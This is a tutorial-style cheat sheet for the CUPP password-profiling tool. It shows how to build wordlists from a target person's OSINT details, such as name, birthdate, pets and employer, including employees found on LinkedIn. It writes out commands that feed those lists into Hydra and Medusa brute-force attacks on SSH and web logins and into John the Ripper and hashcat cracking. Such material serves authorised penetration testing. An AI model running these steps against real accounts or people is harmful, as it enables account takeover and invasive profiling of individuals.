Cupp
CUPP (Common User Passwords Profiler) is an intelligent wordlist generator that creates custom password lists based on target-specific information. It uses OSINT data to generate likely passwords for specific users.
Installation
Linux/Ubuntu
# Clone repository
git clone https://github.com/Mebus/cupp.git
cd cupp
# Make executable
chmod +x cupp.py
# Optional: Create symbolic link
sudo ln -s $(pwd)/cupp.py /usr/local/bin/cuppmacOS
# Install via Homebrew
brew install cupp
# Or from source
git clone https://github.com/Mebus/cupp.git
cd cupp
python3 -m pip install -r requirements.txtBasic Usage
Interactive Mode
# Start interactive profiling session
python3 cupp.py -i
# Answer prompts for:
# - Target name
# - Surname
# - Birthdate
# - Birthplace
# - Company
# - Position
# - Pet names
# - Hobbies
# - Other interestsCommand-Line Options
| Option | Description |
|---|---|
-i, --interactive | Interactive mode (guided questionnaire) |
-w, --wordlist <FILE> | Use existing wordlist as base |
-l, --leet | Add leetspeak variations |
-u, --uppercase | Add uppercase variations |
-d, --download | Download common wordlists from GHDB |
-f, --file <FILE> | Input file with target data |
-o, --output <FILE> | Output file for wordlist |
-m, --minlen <NUM> | Minimum password length |
-M, --maxlen <NUM> | Maximum password length |
-v, --verbose | Verbose output |
Interactive Profiling
Complete Profile Creation
# Run interactive mode
python3 cupp.py -i
# Expected prompts and typical responses:
# Target name: john
# Target name (surname): smith
# Birthdate (DD/MM/YY): 15/06/1985
# Birthplace: london
# Company: acme-corp
# Company position: admin
# Pet names: fluffy,rover
# Hobbies: gaming,football
# Other interests: cars,travel
# Output: john.txt (wordlist file)Output Wordlist
# Generated wordlist includes variations like:
john
smith
john15
smith1985
fluffy
rover
gaming
football
cars
travel
john@1985
smith2001
fluffy123
# ... plus many more combinationsCommand-Line Generation
From User Data
# Create wordlist file with user information
cat > user_profile.txt << EOF
Target name: admin
Surname: user
Birthdate: 01/01/1990
Birthplace: newyork
Company: corporation
Position: administrator
Pet names: max
Hobbies: coding
EOF
# Generate wordlist
python3 cupp.py -f user_profile.txt -o admin_wordlist.txt
# Add leetspeak
python3 cupp.py -f user_profile.txt -o admin_leet.txt -l
# Add uppercase variations
python3 cupp.py -f user_profile.txt -o admin_upper.txt -uAdvanced Techniques
Leet Speak Variations
# Enable leetspeak for advanced obfuscation
python3 cupp.py -i -l
# Common leetspeak mappings:
# a -> 4
# e -> 3
# i -> 1
# o -> 0
# s -> 5
# t -> 7
# l -> 1Length Filtering
# Generate passwords of specific length
python3 cupp.py -i -m 8 -M 16
# Short passwords (8-10 chars)
python3 cupp.py -f profile.txt -o short.txt -m 8 -M 10
# Long passwords (16+ chars)
python3 cupp.py -f profile.txt -o long.txt -m 16 -M 20Combining with Hydra
# Generate wordlist with CUPP
python3 cupp.py -i -o target_wordlist.txt
# Use with Hydra for SSH
hydra -l admin -P target_wordlist.txt ssh://target.com
# Use with Hydra for HTTP
hydra -l admin -P target_wordlist.txt http-post-form://target.com/login:user=^USER^&pass=^PASS^:InvalidUsing CUPP Dictionary
# Download and use GHDB wordlist
python3 cupp.py -d
# Generate from downloaded list
python3 cupp.py -w downloaded_wordlist.txt -o enhanced.txt -lReal-World Profiling Scenarios
Target: IT Admin
# Collect OSINT data
# Name: Robert Johnson
# Works at: TechCorp
# Position: IT Manager
# Hobbies: Linux, security, running
# Created with CUPP:
python3 cupp.py << EOF
robert
johnson
18/04/1982
manchester
techcorp
it manager
spike
linux
security
running
EOF
# Enhanced versions
python3 cupp.py -i -l > robert_leet.txt
python3 cupp.py -i -u > robert_upper.txt
cat robert_leet.txt robert_upper.txt | sort -u > robert_full.txtTarget: Company Employee
# Profile multiple employees from LinkedIn/company page
cat > employees.txt << EOF
name:john
surname:smith
company:acme
position:developer
hobbies:python,git,aws
EOF
python3 cupp.py -f employees.txt -o employee_wordlist.txt
# Test all variations
# john, smith, asmith, jsmith, john_smith, etc.Wordlist Enhancement
Combining CUPP Output with Other Lists
# Generate CUPP wordlist
python3 cupp.py -i -o cupp_base.txt
# Combine with existing wordlists
cat cupp_base.txt rockyou.txt | sort -u > combined_wordlist.txt
# Add variations
echo "$(cat cupp_base.txt)123" >> cupp_base.txt
echo "$(cat cupp_base.txt)!" >> cupp_base.txt
echo "$(cat cupp_base.txt)2024" >> cupp_base.txt
sort -u cupp_base.txt > final_wordlist.txtCreate Targeted Lists
# For SSH bruteforce
python3 cupp.py -i -m 8 -o ssh_wordlist.txt
# For web applications
python3 cupp.py -i -l -u -o web_wordlist.txt
# For specific user account
python3 cupp.py -f admin_profile.txt -o admin_custom.txt -l
# Combine multiple sources
cat cupp_admin.txt cupp_default.txt rockyou.txt | sort -u > complete_wordlist.txtIntegration with Other Tools
With Hydra
# Generate custom wordlist
python3 cupp.py -i -o my_wordlist.txt
# Use with Hydra
hydra -L users.txt -P my_wordlist.txt -s 22 ssh://target.com -t 4
# HTTP form login
hydra -l admin -P my_wordlist.txt http-post-form://target.com/login:username=^USER^&password=^PASS^:F=incorrectWith John the Ripper
# Generate wordlist for rules-based cracking
python3 cupp.py -i -o target_base.txt
# Apply John rules
john --wordlist=target_base.txt --rules hashfile.txt
# Or with hashcat
hashcat -m 0 hashes.txt target_base.txtWith Medusa
# Create targeted wordlist
python3 cupp.py -f profile.txt -o medusa_list.txt -l
# Run Medusa
medusa -h target.com -u admin -P medusa_list.txt -M ssh -t 4Practical Examples
Example 1: Target Employee from LinkedIn
# OSINT gathering:
# Name: Sarah Johnson
# Company: Acme Corporation
# Position: Database Administrator
# Location: Seattle
# Birthday: July 1985
# Interests: Gardening, Travel
# Create wordlist
python3 cupp.py << 'EOF'
sarah
johnson
01/07/1985
seattle
acme
administrator
gardening
travel
EOF
# Output wordlist includes:
# sarah, johnson, sarah01, johnson85
# sarahj, sjohnson, sj1985
# gardening, travel, sarah_gardening
# Plus leetspeak: s4r4h, j0hn50n, g4rd3n1ngExample 2: Service Account Profiling
# For automated service accounts
python3 cupp.py << 'EOF'
svc
backup
prod
service
sql
datacenter
monitoring
EOF
# Target likely variations used in corporations
# Results help crack service account passwordsTips and Tricks
Maximize Wordlist Effectiveness
# Create profile-specific wordlist
python3 cupp.py -i -o base.txt
# Generate multiple variations
python3 cupp.py -i -o base.txt
python3 cupp.py -i -l -o leet.txt
python3 cupp.py -i -u -o upper.txt
# Combine and deduplicate
cat base.txt leet.txt upper.txt | sort -u > full.txt
# Count results
wc -l full.txtFocus on Common Patterns
# Most likely passwords include:
# - Name + numbers (john123, sarah2024)
# - Name + company name (johnacme, sarah_corp)
# - Simple variations (john, J0hn, john!)
# - Hobbies (gardening123, travel2024)
# CUPP generates all these automaticallyTroubleshooting
Large Wordlist Size
# If wordlist becomes too large
wc -l output.txt
# Filter by length
awk 'length > 6 && length < 16' wordlist.txt > filtered.txt
# Use only most common patterns
grep -E '^[a-z]+[0-9]{1,4}$' wordlist.txt > likely.txtImproving Accuracy
# Collect more OSINT data:
# - Multiple hobbies
# - Partner/family names
# - Company information
# - Pet names
# - Sports/interests
# More data = better wordlist
python3 cupp.py -i
# Spend time answering all questions thoroughlyBest Practices
- Collect thorough OSINT before generating wordlist
- Include multiple hobbies and interests
- Combine with date variations
- Test shorter passwords first (most likely)
- Use with appropriate rate limiting in attacks
- Document the profile used for wordlist generation
- Review top 100 passwords first
- Combine CUPP output with other wordlists for breadth
- Use leet and uppercase variations for modern systems
- Validate findings against actual target password policies
Last updated: 2025-03-30 | CUPP GitHub